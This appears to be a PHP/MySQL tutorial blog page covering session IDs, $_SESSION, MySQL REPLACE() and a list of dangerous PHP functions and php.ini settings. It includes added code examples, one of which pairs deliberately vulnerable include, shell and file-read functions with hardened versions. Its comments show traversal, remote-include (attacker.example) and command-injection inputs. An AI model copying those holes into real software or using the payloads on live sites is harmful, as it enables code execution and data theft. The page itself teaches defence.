Secure file download in PHP, Security question PHP, PHP MYSQL Interview Question -Books download - PHP solutions guidelines queries update, phpmysqlquestion
Friday, March 6, 2009
Displaying PHP SessionID
<?php
// session_start() must run before any output, including the <HTML> tag,
// otherwise the Set-Cookie header for PHPSESSID can no longer be sent.
session_start();
?>
<HTML>
<HEAD>
<style type="text/css">
<!--
.style2 {color: #0066FF}
.style3 {
color: #009933;
font-weight: bold;
}
.style5 {color: #0066FF; font-weight: bold; }
-->
</style>
</HEAD>
<BODY>
<strong>Displaying PHP SessionID by Tutorial Guide by http://www.phpmysqlquestion.blogspot.com/
</strong>
<h1 align="center" class="style2">Your PHPSESSID is: <?php echo htmlspecialchars(session_id(), ENT_QUOTES, 'UTF-8'); ?></h1>
<span class="style5">NOTE</span>: If you don't see a session id in the blue header above, hit <span
class="style3">REFRESH</span> on your browser <br />
<br />
<div align="center">Tutorial by <a
href="http://www.phpmysqlquestion.blogspot.com/">http://www.phpmysqlquestion.blogspot.com/</a></div>
</BODY>
</HTML>
Friday, February 27, 2009
Difference between session_register() and $_SESSION in PHP
I read in the manual page http://www.php.net/session_register that using $_SESSION['var'] = $value is better than using session_register('var'). The reason is that session_register() only works if register_globals is set ON in your php.ini file, and for security purposes that option has been disabled by default since PHP 4.2.0 (it was removed entirely in PHP 5.4, together with session_register() itself). You should therefore use $_SESSION['var'] instead; it works regardless of the register_globals setting.
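The two session posts above show how to read a session ID and which API to store session data with, but not how a session should be started and handled on a site that authenticates users. The following is an added example, not code from the original posts: $_SESSION instead of session_register(), server-issued IDs only, hardened cookie flags, and a fresh ID at login. It assumes PHP 7.3 or later (array form of session_set_cookie_params() and setcookie()), that the site runs over HTTPS, and that the user table inside it is constructed sample data standing in for a real credential store.

```php
<?php
// Added example, not code from the original posts: session handling the two
// posts above point at but do not show: $_SESSION instead of
// session_register(), server-issued IDs only, hardened cookie flags, and a
// fresh ID at login. Assumptions: PHP 7.3 or later (array form of
// session_set_cookie_params()), the site runs over HTTPS, and sample_users()
// is constructed sample data in place of a real credential store.
declare(strict_types=1);

function secure_session_start(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    // Reject IDs the server never issued: stops session fixation, where an
    // attacker plants a PHPSESSID of their choosing in the victim's browser.
    ini_set('session.use_strict_mode', '1');
    // The ID travels only in the cookie, never as ?PHPSESSID=... in URLs
    // (which leak through Referer headers and logs).
    ini_set('session.use_only_cookies', '1');
    session_set_cookie_params([
        'lifetime' => 0,        // dropped when the browser closes
        'path'     => '/',
        'secure'   => true,     // assumes HTTPS
        'httponly' => true,     // not readable from JavaScript
        'samesite' => 'Lax',
    ]);
    // Like any session_start(), this must run before the first byte of output.
    session_start();
}

// Constructed sample credentials; a real site reads hashes from its database.
function sample_users(): array
{
    return ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
}

function login(string $username, string $password): bool
{
    secure_session_start();
    $users = sample_users();
    if (!isset($users[$username]) || !password_verify($password, $users[$username])) {
        return false;
    }
    // Swap the pre-login ID for a new one so an ID known before
    // authentication never becomes an authenticated session.
    session_regenerate_id(true);
    $_SESSION['user']     = $username;   // $_SESSION, not session_register('user')
    $_SESSION['login_at'] = time();
    return true;
}

function current_user(): ?string
{
    secure_session_start();
    return $_SESSION['user'] ?? null;
}

function logout(): void
{
    secure_session_start();
    $_SESSION = [];
    // Expire the cookie with the same attributes it was set with, then
    // delete the server-side data.
    $p = session_get_cookie_params();
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}
```

Printing session_id() as the tutorial page does is fine for a demonstration, but a production page should never expose the session ID: anything that captures it (a screenshot, a log line, a script injected into the page) can replay the session. The regenerate-on-login step is the one most often missed; without it, use_strict_mode alone does not protect a site where an attacker can obtain a valid pre-login ID.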
Wednesday, February 25, 2009
Using SELECT REPLACE with MySQL
The REPLACE() function takes three parameters:
- the string or column name to do the replacement on
- what to look for
- and what to replace it with
It replaces every occurrence, the match is case-sensitive, and it returns NULL if any argument is NULL. The following example replaces the 'aaa' part of 'aaa bbb ccc' with 'xyz', so the column returned from the SQL query will contain 'xyz bbb ccc':
SELECT REPLACE('aaa bbb ccc', 'aaa', 'xyz');
If you were doing this against the column "foo" you would do this instead:
SELECT REPLACE(foo, 'aaa', 'xyz');
My example
In my case I had two columns, 'image_small' and 'image_large', with example data like so:
+------------+--------------+-------------+
| content_id | image_small  | image_large |
+------------+--------------+-------------+
|          1 | small1.jpg   | big1.jpg    |
|         26 | small26.jpg  | big26.jpg   |
|         27 | small27.jpg  | big27.gif   |
|         24 | small24.jpg  | big24.jpg   |
|        419 | small208.gif | big419.gif  |
+------------+--------------+-------------+
I wanted to replace 'small' with an empty string in one column and 'big' with an empty string in the other, in the select query, and then see whether the remaining filenames were the same in each row. This can be done with the following query:
SELECT content_id, REPLACE(image_small, 'small', '') AS image_small, REPLACE(image_large, 'big', '') AS image_large FROM content
The resulting data looks like this:
+------------+-------------+-------------+
| content_id | image_small | image_large |
+------------+-------------+-------------+
|          1 | 1.jpg       | 1.jpg       |
|         26 | 26.jpg      | 26.jpg      |
|         27 | 27.jpg      | 27.gif      |
|         24 | 24.jpg      | 24.jpg      |
|        419 | 208.gif     | 419.gif     |
+------------+-------------+-------------+
Extending my example with IF()
The only problem with the above example is that I still have to scan every row by eye to see which ones do and don't match. The query can be extended with IF() to output 1 or 0 depending on whether the filenames (without the 'small' and 'big' parts) match.
SELECT content_id,
REPLACE(image_small, 'small', '') as image_small,
REPLACE(image_large, 'big', '') as image_large,
IF(REPLACE(image_small, 'small', '') = REPLACE(image_large, 'big', ''), 1, 0) AS matches
FROM content
This adds an extra column called "matches" which will display 1 if the two filenames match or 0 if they don't:
+------------+-------------+-------------+---------+
| content_id | image_small | image_large | matches |
+------------+-------------+-------------+---------+
|          1 | 1.jpg       | 1.jpg       |       1 |
|         26 | 26.jpg      | 26.jpg      |       1 |
|         27 | 27.jpg      | 27.gif      |       0 |
|         24 | 24.jpg      | 24.jpg      |       1 |
|        419 | 208.gif     | 419.gif     |       0 |
+------------+-------------+-------------+---------+
Now it's much easier to see which rows have the same filenames once the 'small' and 'big' text has been removed, by combining the REPLACE() and IF() MySQL functions. To list only the rows that differ, put the same comparison in a WHERE clause instead of (or as well as) the IF() column.
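The queries above are typed straight into the MySQL client with the prefixes as literals. When the same comparison runs from PHP with the prefixes coming from the application, they should be bound as parameters rather than spliced into the SQL string. The following is an added example, not code from the original post: the REPLACE() comparison through PDO with bound parameters and an optional mismatch-only filter. It uses an in-memory SQLite database so it runs offline; the content table and rows are constructed from the post's sample data, and MySQL's IF(cond, 1, 0) is written as a CASE expression, which both MySQL and SQLite accept (REPLACE() behaves the same in both engines).

```php
<?php
// Added example, not code from the original post: the REPLACE()-based
// comparison run from PHP through PDO with the prefixes bound as parameters.
// It uses an in-memory SQLite database so it runs offline; the content table
// and its rows are constructed here from the post's sample data.
// Assumption: MySQL's IF(cond, 1, 0) is written as a CASE expression, which
// both MySQL and SQLite accept; REPLACE() behaves the same in both.
declare(strict_types=1);

function build_sample_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE content (
        content_id  INTEGER PRIMARY KEY,
        image_small TEXT,
        image_large TEXT
    )');
    $insert = $db->prepare('INSERT INTO content VALUES (?, ?, ?)');
    $rows = [   // constructed from the post's sample table
        [1,   'small1.jpg',   'big1.jpg'],
        [26,  'small26.jpg',  'big26.jpg'],
        [27,  'small27.jpg',  'big27.gif'],
        [24,  'small24.jpg',  'big24.jpg'],
        [419, 'small208.gif', 'big419.gif'],
    ];
    foreach ($rows as $row) {
        $insert->execute($row);
    }
    return $db;
}

// Returns one row per content_id with the stripped filenames and a 0/1
// "matches" flag, or only the rows that do not match when $onlyMismatches
// is set. The prefixes are bound once each through a derived table and
// never spliced into the SQL string, so a prefix containing a quote cannot
// alter the query.
// Caveat: REPLACE() returns NULL for a NULL input, and NULL <> NULL is not
// true, so a row with a NULL filename never appears in the mismatch list.
function compare_filenames(PDO $db, string $smallPrefix, string $largePrefix, bool $onlyMismatches = false): array
{
    $sql = 'SELECT content_id, s AS image_small, l AS image_large,
                   CASE WHEN s = l THEN 1 ELSE 0 END AS matches
            FROM (SELECT content_id,
                         REPLACE(image_small, :sp, \'\') AS s,
                         REPLACE(image_large, :lp, \'\') AS l
                  FROM content) AS stripped'
         . ($onlyMismatches ? ' WHERE s <> l' : '')
         . ' ORDER BY content_id';
    $stmt = $db->prepare($sql);
    $stmt->execute([':sp' => $smallPrefix, ':lp' => $largePrefix]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = build_sample_db();
foreach (compare_filenames($db, 'small', 'big', true) as $row) {
    printf("%d: %s vs %s\n", $row['content_id'], $row['image_small'], $row['image_large']);
}
```

Run against the sample rows, the mismatch-only call returns the two rows the post's own table flags with matches = 0 (content_id 27 and 419). The derived table is also the tidier way to write the MySQL original: each REPLACE() appears once instead of twice.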
Tuesday, February 24, 2009
Holes in PHP applications
PHP Code Execution
* require() and include() (and their _once variants) - Both read the specified file and interpret its contents as PHP code, so a user-controlled path means arbitrary code execution
* eval() - Interprets a given string as PHP code
* preg_replace() - When used with the /e modifier this function interprets the replacement string as PHP code (the modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback() is the replacement)
Command Execution
* exec() - Executes a specified command and returns the last line of the program's output (the full output can be collected into an array through its second argument)
* passthru() - Executes a specified command and passes all of its output, binary data included, directly to the remote browser
* `` (backticks) and shell_exec() - Execute the specified command and return its complete output as a string
* system() - Much the same as passthru() but prints the output line by line and returns the last line, so it doesn't handle binary data
* popen() (and proc_open()) - Executes a specified command and connects its output or input stream to a PHP file descriptor
File Disclosure
* fopen() - Opens a file and associates it with a PHP file descriptor
* readfile() - Reads a file and writes its contents directly to the remote browser
* file() and file_get_contents() - Read an entire file into an array or a string
In every case the hole is the same: a path, command or string built from user input (query string, POST data, cookies, headers) without validation reaches one of these functions.
Configuration
* Set register_globals off - This option stops PHP creating global variables from user input. That is, if a user submits the form variable 'hello', PHP won't set $hello, only $_GET['hello'] or $_POST['hello']. This is the mother of all other options and the best single option for PHP security; it also breaks any third-party application that relies on the old behaviour and makes programming PHP a whole lot less convenient. (It has been off by default since PHP 4.2.0 and was removed in PHP 5.4, so on a current PHP there is nothing to switch off.)
* Set safe_mode on - this introduces a large variety of restrictions including:
o The ability to restrict which commands can be executed (by exec() etc)
o The ability to restrict which functions can be used
o Restricts file access based on ownership of script and target file
o Effectively breaks file uploads
This is a great option for ISP environments (for which it was designed) and it can also improve the security of normal PHP environments given proper configuration. See the Safe Mode manual page for details. Note that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4; on current versions the function restrictions are done with disable_functions and the file restrictions with open_basedir.
* Set open_basedir - This option prevents PHP's file functions from touching files outside the specified directories, which effectively kills a variety of local include() and path-traversal attacks. It does not constrain commands run through exec() and friends, and caution is still required in regards to file upload and session files.
* Set display_errors off, log_errors on - This prevents PHP error messages being displayed in the returned web page, which limits an attacker's exploration of the script they are attacking (file paths, SQL fragments, variable names). It can also make debugging very frustrating, so keep the error log where developers can read it.
* Set allow_url_fopen off - This stops the remote-file functionality (fopen() and include on http:// or ftp:// URLs). Very few sites really need it. Since PHP 5.2 remote include() is governed separately by allow_url_include, which should stay off even where allow_url_fopen has to be enabled.
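The lists above name the dangerous functions and the php.ini switches that limit the damage, but the fix that actually closes each hole is in the application code. The following is an added example, not code from the original post: for each of the three hole classes, the vulnerable pattern beside a hardened replacement. It assumes a templates directory and a downloads directory under the script's own directory that hold only files meant to be included or served (TEMPLATE_DIR and DOWNLOAD_DIR are assumed names), and that the function arguments come straight from $_GET and are attacker-controlled.

```php
<?php
// Added example, not code from the original post: each hole class listed
// above as the vulnerable pattern beside a hardened replacement.
// Assumptions: TEMPLATE_DIR and DOWNLOAD_DIR exist and hold only files meant
// to be included or served; the string arguments arrive from $_GET and are
// attacker-controlled.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed layout
const DOWNLOAD_DIR = __DIR__ . '/downloads';   // assumed layout

// 1. Code execution through include()
// VULNERABLE: ?page=../../../../etc/passwd (any readable file is parsed as
// PHP) or, with allow_url_include on, ?page=http://attacker.example/x
// interprets attacker-chosen content as PHP.
function show_page_vulnerable(string $page): void
{
    include TEMPLATE_DIR . '/' . $page . '.php';
}

// HARDENED: user input selects a key in a fixed allowlist and never becomes
// part of the path. open_basedir is a second line of defence, not a
// substitute for this.
function show_page_hardened(string $page): void
{
    $allowed = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];
    if (!isset($allowed[$page])) {
        http_response_code(404);
        return;
    }
    include TEMPLATE_DIR . '/' . $allowed[$page];
}

// 2. Command execution through exec()
// VULNERABLE: host=example.com;id  or  host=$(id)  runs a second command.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec('ping -c 1 ' . $host);
}

// HARDENED: validate against a strict hostname pattern, reject a leading
// dash (option injection such as "-f"), and still quote with
// escapeshellarg() so shell metacharacters are inert.
function ping_hardened(string $host): string
{
    if ($host === '' || $host[0] === '-' || !preg_match('/\A[A-Za-z0-9.-]{1,253}\z/', $host)) {
        throw new InvalidArgumentException('invalid host');
    }
    $lines = [];
    exec('ping -c 1 ' . escapeshellarg($host), $lines, $status);
    return implode("\n", $lines);
}

// 3. File disclosure through readfile()
// VULNERABLE: file=../../../../etc/passwd reads outside the download directory.
function download_vulnerable(string $file): void
{
    readfile(DOWNLOAD_DIR . '/' . $file);
}

// Resolve a requested name to a real file under DOWNLOAD_DIR, or null.
// basename() drops any directory part; realpath() collapses ../ and follows
// symlinks, so the prefix test catches traversal and links pointing outside.
function resolve_download(string $file): ?string
{
    $base = realpath(DOWNLOAD_DIR);
    $real = realpath(DOWNLOAD_DIR . '/' . basename($file));
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// HARDENED: serve only what resolve_download() accepted, as a download.
function download_hardened(string $file): void
{
    $path = resolve_download($file);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}
```

The pattern is the same in all three: user input chooses among values the code already trusts (an allowlist key, a validated hostname, a file that resolves inside the base directory) and is never concatenated raw into a path or command. The php.ini settings above (open_basedir, disable_functions, allow_url_include off) then limit what an overlooked hole can reach.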